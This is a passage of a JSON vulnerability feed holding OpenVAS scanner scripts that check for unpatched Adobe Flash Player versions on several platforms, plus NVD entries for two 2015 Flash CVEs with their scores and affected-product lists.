addresses.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause denial of service, execute arbitrary code, bypass the ASLR\n protection mechanism via unspecified vectors and allow local users to gain\n privileges .\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 11.2.202.457 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 11.2.202.457 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.457\"))\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + \"11.2.202.457\" + '\\n';\n security_message(data:report);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "Gentoo Linux Local Security Checks GLSA 201504-07", "modified": "2018-10-26T00:00:00", "published": 
"2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121374", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121374", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201504-07", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201504-07.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121374\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:48 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201504-07\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Adobe Flash Player. 
Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201504-07\");\n script_cve_id(\"CVE-2015-0346\", \"CVE-2015-0347\", \"CVE-2015-0348\", \"CVE-2015-0349\", \"CVE-2015-0350\", \"CVE-2015-0351\", \"CVE-2015-0352\", \"CVE-2015-0353\", \"CVE-2015-0354\", \"CVE-2015-0355\", \"CVE-2015-0356\", \"CVE-2015-0357\", \"CVE-2015-0358\", \"CVE-2015-0359\", \"CVE-2015-0360\", \"CVE-2015-3038\", \"CVE-2015-3039\", \"CVE-2015-3040\", \"CVE-2015-3041\", \"CVE-2015-3042\", \"CVE-2015-3043\", \"CVE-2015-3044\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201504-07\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 11.2.202.457\"), vulnerable: make_list(\"lt 11.2.202.457\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:13:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", 
"CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2015-04-20T00:00:00", "id": "OPENVAS:1361412562310805465", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805465", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Mac OS X)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805465\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3043\", \"CVE-2015-3042\", \"CVE-2015-3041\",\n \"CVE-2015-3040\", \"CVE-2015-3039\", \"CVE-2015-3038\", \"CVE-2015-0360\",\n \"CVE-2015-0359\", \"CVE-2015-0357\", \"CVE-2015-0356\", \"CVE-2015-0355\",\n \"CVE-2015-0354\", \"CVE-2015-0353\", \"CVE-2015-0352\", \"CVE-2015-0351\",\n \"CVE-2015-0350\", \"CVE-2015-0349\", \"CVE-2015-0348\", \"CVE-2015-0347\",\n \"CVE-2015-0346\", \"CVE-2015-0358\");\n script_bugtraq_id(74065, 74062, 74068, 74064, 74067, 74066, 74069);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-04-20 12:42:00 +0530 (Mon, 20 Apr 2015)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple unspecified use-after-free errors.\n\n - Multiple unspecified double free vulnerabilities.\n\n - An overflow condition that is triggered as user-supplied input is not\n properly validated.\n\n - Improper restriction of discovery of memory 
addresses.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause denial of service, execute arbitrary code, bypass the ASLR\n protection mechanism via unspecified vectors and allow local users to gain\n privileges .\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player versions before\n 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.281 or 17.0.0.169 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"13.0.0.281\"))\n{\n fix = \"13.0.0.281\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:playerVer, test_version:\"14.0\", test_version2:\"17.0.0.168\"))\n{\n fix = \"17.0.0.169\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", 
"CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "Gentoo Linux Local Security Checks GLSA 201505-02", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121376", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121376", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201505-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201505-02.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121376\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:49 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201505-02\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Adobe Flash Player. 
Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201505-02\");\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\", \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\", \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\", \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\", \"CVE-2015-3093\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201505-02\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 11.2.202.460 \"), vulnerable: make_list(\"lt 11.2.202.460 \"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:37:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", 
"CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.", "modified": "2020-01-31T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310851099", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851099", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2015:0878-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851099\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 20:00:42 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\", \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\", \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\", \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\", \"CVE-2015-3093\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2015:0878-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Adobe flash-player package was updated to version 11.2.202.460 to fix\n several security issues.\n\n The following vulnerabilities were fixed (bsc#930677):\n\n * APSB15-09, CVE-2015-3044, CVE-2015-3077, CVE-2015-3078, CVE-2015-3079,\n CVE-2015-3080, CVE-2015-3081, CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3084, CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\n CVE-2015-3088, CVE-2015-3089, CVE-2015-3090, CVE-2015-3091,\n CVE-2015-3092, CVE-2015-3093\n\n More information can be 
found at the referenced Adobe Security Bulletin APSB15-09.\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0878-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.460~83.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.460~83.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T20:03:03", "description": "Use-after-free vulnerability in Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-0349, CVE-2015-0351, and CVE-2015-0358.\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "edition": 5, "cvss3": {}, "published": "2015-04-14T22:59:00", 
"title": "CVE-2015-3039", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3039"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:adobe:flash_player:11.2.202.451", "cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/o:suse:suse_linux_enterprise_desktop:12.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.6.z", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/o:suse:suse_linux_enterprise_desktop:11.0", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_server_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/o:suse:suse_linux_workstation_extension:12.0", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-3039", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3039", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.6.z:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.451:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:03", "description": "Adobe Flash Player before 13.0.0.281 and 14.x through 17.x 
before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux does not properly restrict discovery of memory addresses, which allows attackers to bypass the ASLR protection mechanism via unspecified vectors, a different vulnerability than CVE-2015-0357.", "edition": 5, "cvss3": {}, "published": "2015-04-14T22:59:00", "title": "CVE-2015-3040", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3040"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:adobe:flash_player:11.2.202.451", "cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/o:suse:suse_linux_enterprise_desktop:12.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.6.z", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/o:suse:suse_linux_enterprise_desktop:11.0", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_server_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", 
"cpe:/o:suse:suse_linux_workstation_extension:12.0", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-3040", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3040", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.6.z:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", 